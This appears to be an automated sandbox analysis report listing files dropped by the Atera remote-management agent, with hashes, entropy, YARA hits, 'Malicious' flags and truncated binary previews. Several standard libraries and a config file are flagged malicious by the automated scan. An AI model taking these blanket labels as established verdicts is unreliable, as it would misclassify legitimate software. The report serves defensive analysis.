                                                                                                                                                                                                                                        SHA-256:04C547E06CA956DB2B929CC2B6B695A649FF0F82C52E56F2677A887E7D9616DE
                                                                                                                                                                                                                                        SHA-512:FEBB46D70A5466C85087BD4E42FBA81682CF398739F7EFEF43982C830CCFD6FCEC4613F0B5542951A463161C891EE9F378CD4D2B15B1659DCBC0E15A34BA677F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c.........." ..0..:..........^X... ...`....... ...............................F....`..................................X..O....`..8............D..0(...........V............................................... ............... ..H............text...d8... ...:.................. ..`.rsrc...8....`.......<..............@..@.reloc...............B..............@..B................@X......H.......|f..X............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tM...r...p((..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):671744
                                                                                                                                                                                                                                        Entropy (8bit):5.893336561237734
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:fBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36Q:fBA/ZTvQD0XY0AJBSjRlXP36Q
                                                                                                                                                                                                                                        MD5:C3689CE3217DD82D57880C31B89A9437
                                                                                                                                                                                                                                        SHA1:051E913AAC2F4345D2364894C4154ABD287DB3FD
                                                                                                                                                                                                                                        SHA-256:9367CB126577146DB3B9C26DD00DD71C7B228F30C0FA6C698FAC26CAEAB14D43
                                                                                                                                                                                                                                        SHA-512:3471C18A4D79ED7C5FD268B25904EA2D6F3A15551B6517BD23ACD8ADE84FFF301492EC6C8861624E6F2699CDF9046DA2A8BAF351FB88EFC3AD4673A42AE57F7B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ......Ee....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):833993
                                                                                                                                                                                                                                        Entropy (8bit):7.999644881255343
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:24576:peRqTiLR3omp/AAzr5nxL2CP+sZ4tgMfQo:p8nLR4WYA72CPPoKo
                                                                                                                                                                                                                                        MD5:9B1F97A41BFB95F148868B49460D9D04
                                                                                                                                                                                                                                        SHA1:768031D5E877E347A249DFDEAB7C725DF941324B
                                                                                                                                                                                                                                        SHA-256:09491858D849212847E4718D6CC8F2B1BC3CAA671CEB165CF522290B960262E4
                                                                                                                                                                                                                                        SHA-512:9C8929A78CB459F519ACE48DB494D710EFD588A19A7DBEA84F46D02563CC9615DB8AA78A020F08ECA6FA2B99473D15C8192A513B4DF8073AEF595040D8962AE4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-.....;9rX.9..........9...AgentPackageInternalPoller/AgentPackageInternalPoller.exe....0Z.......U........ee..Th8.............t.v.g....g......M.........c..K.`|.'1.W.g.;.W+.e.....D.."|...]-:.To.:.`B(.E{.T.?..z...&.....g.....1.,km8.....Y......WZm;..!.....k.....iA...~.zK..EW'.....p.A....Q6.~S......A.......6....h=C3N0y.$i....M...N....C......I.....UCp.p....x..WQ!.p..>.'N%.2Z.l.R8./...%Ew..T..yy.....q...U.nqH......".......n.6M..P.:t...t1..r...!9Z.N.X.s8.3.9V.a...m8....LpWS..O.8..R6..O.l....e|(..F...Og.h.0..,..Z.H....Rl..L.N.9.\...."4..%..A.<."..Iy...:..GBw_1......3.y.p...a...*...l..._.FI.Z.....+.L.....]Y.K|RM.Pf..in.........93+2.QMH.t......<...3.. ....2..!....t..)).I\.qw1.'..J...J3".K'rt.h.f+.I.7...q.MK......V.._!Q.].w..au.[.brv.T&..Lfm./..J.$.m...... t.u..uQ...L...\...M.Ihp.rG.J..C".....d.....;z..d....L.p.r.c7....q[2.e.........!(....Ld.....M..9...M....>EN&dY.]....>QUJ..N.+d.cr..].D.o.........?o.~@....@..D[...5.C.eP.a.....;..:.._v.....R

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):219696
                                                                                                                                                                                                                                        Entropy (8bit):5.943430076853408
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:It3Mf3ZwYUPEpbPwygJQetg0+BpU3I0toxhGf:2MfJPpjYN8hI
                                                                                                                                                                                                                                        MD5:01807774F043028EC29982A62FA75941
                                                                                                                                                                                                                                        SHA1:AFC25CF6A7A90F908C0A77F2519744F75B3140D4
                                                                                                                                                                                                                                        SHA-256:9D4727352BF6D1CCA9CBA16953EBD1BE360B9DF570FD7BA022172780179C251E
                                                                                                                                                                                                                                        SHA-512:33BD2B21DB275DC8411DA6A1C78EFFA6F43B34AFD2F57959E2931AA966EDEA46C78D7B11729955879889CBE8B81A8E3FB9D3F7E4988E3B7F309CBD1037E0DC02
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{..e.........."...0..&..........:D... ...`....@.. ..............................h)....`..................................C..O....`..d............2..0(...........B............................................... ............... ..H............text....$... ...&.................. ..`.rsrc...d....`.......(..............@..@.reloc...............0..............@..B.................D......H........@..$.......f.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ...x )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*..{....*..{ ...*..{!...*r.(......}......} .....}!...*..0..Y........u........L.,G(.....{.....{....o....,/(.....{ ....{ ...o....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):541
                                                                                                                                                                                                                                        Entropy (8bit):5.097123194334321
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdGp2VvOF9LNFF7ap+5v5OXrRf/2//FicYo4xT:JdsIOvPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                        MD5:D0EFB0A6D260DBE5D8C91D94B77D7ACD
                                                                                                                                                                                                                                        SHA1:E33A8C642D2A4B3AF77E0C79671EAB5200A45613
                                                                                                                                                                                                                                        SHA-256:7D38534766A52326A04972A47CACA9C05E95169725D59AB4A995F8A498678102
                                                                                                                                                                                                                                        SHA-512:A3F1CFF570201B8944780CF475B58969332C6AF9BEA0A6231E59443B05FC96DF06A005FF05F78954DBE2FEC42DA207F6D26025AA558D0A30A36F0DF23A44A35C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhXWp:WBc
                                                                                                                                                                                                                                        MD5:DFDD2EB77BBB74518BAD98519A857D41
                                                                                                                                                                                                                                        SHA1:5F4F91D73EA620CDF0E5AC458E80B71412B1BB9F
                                                                                                                                                                                                                                        SHA-256:7655078305CC5B4F62569EF9868E1B04FCC491D33FDAD1F8E4610C038BCBAC8D
                                                                                                                                                                                                                                        SHA-512:481CDA97C03294EBAB036F99727828983C8D0E4C137AF05FDEA7FD296D11378904BACCE2D58D44F932A0BF7F2A30A9B44F4CBC05E253F132B1EF641F648C8DF0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=23.8

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentCommunication.Models.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):52272
                                                                                                                                                                                                                                        Entropy (8bit):6.300719339270839
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:5i8fXCGsSVh/2ixXxKFArYCJdshn9xvlOaEpYinAMxCuMr:5FaM2gS1y2F9Ob7HxCr
                                                                                                                                                                                                                                        MD5:9467F653980C1C37E4C64811BA27C976
                                                                                                                                                                                                                                        SHA1:68130FABBB50EAF5CFE2C355BA13B303DD373FB6
                                                                                                                                                                                                                                        SHA-256:821847799A2B7B3A6EC20BA61388AC87707D9C6865BD904A44DE5B033BD2EF29
                                                                                                                                                                                                                                        SHA-512:E72B7802256053589D889B2B7E74A2B53F328289A12CC0D4930D66410D00585C67B2C434512473CD2E74C8F2CB7685C2C34FCFC3DBA4A52399532CEB04153597
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... ..............................t.....`.................................2...O.......................0(..........@...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................f.......H...........x.............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{ ...*"..} ...*..{!...*"..}!...*..{"...*"..}"...*..{#...*"..}#...*..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):96816
                                                                                                                                                                                                                                        Entropy (8bit):6.1801131806578455
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:hJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvC7Hxwx:hQUm2H5KTfOLgxFJjE50vksVUfPvCI
                                                                                                                                                                                                                                        MD5:F1B2303DD7E152BA70F3537EDB2E9638
                                                                                                                                                                                                                                        SHA1:7E359D4B9011449DABB7F8236F14851A346B5028
                                                                                                                                                                                                                                        SHA-256:8EE8B304339B6F87E79B117F605375AFFFCBABA290A1B41BB6B3C1A40E46767C
                                                                                                                                                                                                                                        SHA-512:A4DD48F1AFF528DADF9974ADA1740CE785823FB584F55191D008158FCFB11F9ADAD8EFF992B8FF761058706C1717E28FBC9C337CF39D4EE4FFAA529501CB3188
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0.d.........." ..0..H..........zf... ........... ..............................l.....`.................................(f..O.......8............R..0(...........d............................................... ............... ..H............text....F... ...H.................. ..`.rsrc...8............J..............@..@.reloc...............P..............@..B................\f......H........k..D............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\LastSyncDevicesTime.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):19
                                                                                                                                                                                                                                        Entropy (8bit):2.755057619938308
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:YzT1Q:M1Q
                                                                                                                                                                                                                                        MD5:C30F6D82CD2BF2850CC267E349F09EFA
                                                                                                                                                                                                                                        SHA1:8F687530F4F15987251968B4375DFB9582166AFA
                                                                                                                                                                                                                                        SHA-256:CF3E34E9198A8E2A08CCF678D69E1ACDCD8D822B056A7D87AD3F8661A55D246B
                                                                                                                                                                                                                                        SHA-512:99BF3AA409771CB61C973FCAC8B4D9C212D4B852E2F23E248B1FDB698347EFA5ADC651DA24F14A55C627A8B1015F5EA0650EFAE2A59D94C8782F3BAB2739C664
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:02/10/2024 11:20:32

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\LiteDB.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):499760
                                                                                                                                                                                                                                        Entropy (8bit):6.056862695710082
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:HXv781Hpx+GfCdLr/jd9yyeEAHweiPofdyz7qd352SW8CdykAfqO:/76BfC5avfdyvc2SN
                                                                                                                                                                                                                                        MD5:3CE7E73DB6F575A0D382DDAA8E1A3C10
                                                                                                                                                                                                                                        SHA1:031C13652C540CA7F798D141D7C3333FB1C71618
                                                                                                                                                                                                                                        SHA-256:692185C37DB7505250E58CC55D6707FCB099315A7FF319A9CC92FD99C5F0EEA7
                                                                                                                                                                                                                                        SHA-512:5270E772613864BD223F31F89CFA500E56E7863967C58C503F92E193AF8C8CAF934B7755868EC21585A38E8D6D186A2DC5528A805A62A0BFA56B59E6506BFF81
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....,..........." ..0..p............... ........... ....................................`.................................?...O....................x..0(..........t...T............................................ ............... ..H............text....n... ...p.................. ..`.rsrc................r..............@..@.reloc...............v..............@..B................s.......H.......(d...(...........................................................{J...*..{K...*V.(L.....}J.....}K...*...0..A........u;.......4.,/(M....{J....{J...oN...,.(O....{K....{K...oP...*.*.*. 8..z )UU.Z(M....{J...oQ...X )UU.Z(O....{K...oR...X*...0..b........r...p......%..{J......%q>....>...-.&.+...>...oS....%..{K......%q?....?...-.&.+...?...oS....(T...*2.(U...oV...*..-.rE..psW...z.(U....oX...oV...*:...(....(Y...*:...(....(Y...*N..{Z....o...+(Y...*z.{[....{Z....{\....s]...(^...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.960733432365752
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:bBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUk:bBjk38WuBcAbwoA/BkjSHXP36RMGt
                                                                                                                                                                                                                                        MD5:2A9525F27730CBF9E7145AADE4CDA830
                                                                                                                                                                                                                                        SHA1:A6A99E02599656DE1C7F51B02C84BBA8AAE0346D
                                                                                                                                                                                                                                        SHA-256:29D0073080509DB7F3F20C47980A1347CC4139C5F2E26C9C160AE67CE5EECB6E
                                                                                                                                                                                                                                        SHA-512:DDDEEC7AA9D3F9E6187718564AE1A447FCAB12EC2DCBD26EDD87217B4815C274A6BAF90A027766FCC94815C762ED9BFA8D0DEF6C1B2F84279DED9C66852D381E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ...... .....`....................................O.......................0(.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Polly.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):277040
                                                                                                                                                                                                                                        Entropy (8bit):6.190626027944278
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:rSOIleacQlBh2YQMoIBhpq01TLvlj9b6gRZNsRYA:suQlBAMW0BvltxZ6B
                                                                                                                                                                                                                                        MD5:4ECF017FD71CC84A4CBAB7507B8634BE
                                                                                                                                                                                                                                        SHA1:2343F37490F9A11F5F0878A1553F0FAF504FE062
                                                                                                                                                                                                                                        SHA-256:871D9403D045F94FC433907E49B68894764FCAF81E12FBDE2AC7A08642DDA32C
                                                                                                                                                                                                                                        SHA-512:5FCB9BDA9C857BA1AD2EC0B19AD109AC54BAC91B8F8F00968560623C8AFD01FAEE1078F7C76010C7526A37C46EE0DB74A0E0DB151186F8FB220105F7091FA69B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..............'... ...@....... ..............................>.....@..................................&..O....@..L...............0(...`.......%..T............................................ ............... ..H............text........ ...................... ..`.rsrc...L....@......................@..@.reloc.......`......................@..B.................&......H.......L[......................`%......................................^.{....,.(:...z..}.....*^.{....,.(:...z..}.....*"..(?...*"..(@...*...0..,.......sp......}........q...s7...sj....{.....(....*.0..-.......sr......}........s...s7....ss....{.....(....*....0..(.......st......}........u...s7.....{.....(....*.0..'.......sv......}........w...s7...sj.....(....*B...ss.....(....*......(....*.0..'.......sx......}........y...s7...sj.....(....*F...ss......(....*....0..Z..........}....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\SharpSnmpLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):149552
                                                                                                                                                                                                                                        Entropy (8bit):6.059724018456156
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:o/S+nps5/3oat9QrwQmUgs0giOBDQntBBGBBKBUkBBXBBgBBFBUABU1BB0BBBBgB:o/S+nps5/3f9Qrdd5EtBBGBBKBUkBBXh
                                                                                                                                                                                                                                        MD5:2FF31980FD256EF1B1E143D4699BB727
                                                                                                                                                                                                                                        SHA1:608A21DA2B243E63DAD9E36EE84BC38C921F8E77
                                                                                                                                                                                                                                        SHA-256:F34AD6FB7847A85ADBE1492C783233A8A32BB5E96972FA3738538CE20513F682
                                                                                                                                                                                                                                        SHA-512:2FEF83A7668D190297863592FBBC8E766042067138C3A163771CDCF1FB284BC8162EA6B7B958CB076B6AB654216B855324AE292F78931C47EDC33B52376943AD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:.R..........." ..0..............3... ...@....... ...............................5....`..................................2..O....@............... ..0(...`.......1..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................2......H.......H....1..................81.......................................0..S........-.r...ps!...zs".....o#.....g...%.. .o$......+......(%...,...o&.....X....i2..o'...*..0...........-.r...ps!...zs".....s(.....~o...%-.&~n.........s)...%.o...(...+o+....+X.o,.....(-...-.r...pr...ps....z..o/...&.o0....3(.o1... ....(2.....(3...,....o&.....o4....o5...-....,..o6.....o0...,.rK..pr...ps....z.o'...*.......F.d.......z.-.r...ps!...z.(7....-. o8...*..0..U........-.r...ps!...zs9........+ ..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.Runtime.InteropServices.RuntimeInformation.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27184
                                                                                                                                                                                                                                        Entropy (8bit):6.334370226233819
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Bn1VM0JrpNWDcIh6leOiDFIFBYp1+/EpYinAMxCw:BnvXYcIh6yFIFBYpc47Hxn
                                                                                                                                                                                                                                        MD5:A964D6B5F323E343E884A1E4EBBA21A3
                                                                                                                                                                                                                                        SHA1:41FEA32C2FCC56070CF904AB441019F963C83ED5
                                                                                                                                                                                                                                        SHA-256:0214D2C78CC1DBE92853305FA12119BBE09EA06B5EB9C4B4E7AD76B6FAF232ED
                                                                                                                                                                                                                                        SHA-512:3E93C094D3B9D77BAE9C1725B452743FDFA0A20EB07FFC50EA861C501821710A2C29197CF43DCEC1BF089A5BC9B8F2BF57F9FD0EC8D9805D00E32538D03CD46C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Ub.X.........." ..0..8...........W... ...`....... ....................................@.................................dW..O....`...............B..0(..........,V............................................... ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............@..............@..B.................W......H.......4%..p/...........T.......U......................................r~....-.(....s.........~....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*2r...p.(....*......(....*2(.....(....*^~....-.(.........~....*..0..........~..........(

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.ValueTuple.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):73264
                                                                                                                                                                                                                                        Entropy (8bit):5.955083228632948
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:R784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRX:R7N1r9KGI04CCARLX
                                                                                                                                                                                                                                        MD5:FA432B69828C0F175E44B367AF91ED2D
                                                                                                                                                                                                                                        SHA1:C0E72D5C64E9B560311EBD1EC3A35CED46386C78
                                                                                                                                                                                                                                        SHA-256:6718AFA55EF89805B69360C9E88347A39CC302AB3C16590E78136C20DB025613
                                                                                                                                                                                                                                        SHA-512:E0C54D9126C557C24013486A31D5477EFF2B800ADAE472C3103EE1F1CD527546E6DCEFB19D5DCE602AEE6DA7A0290F413CE2C6C09DF28D4333C4E62510FE2064
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
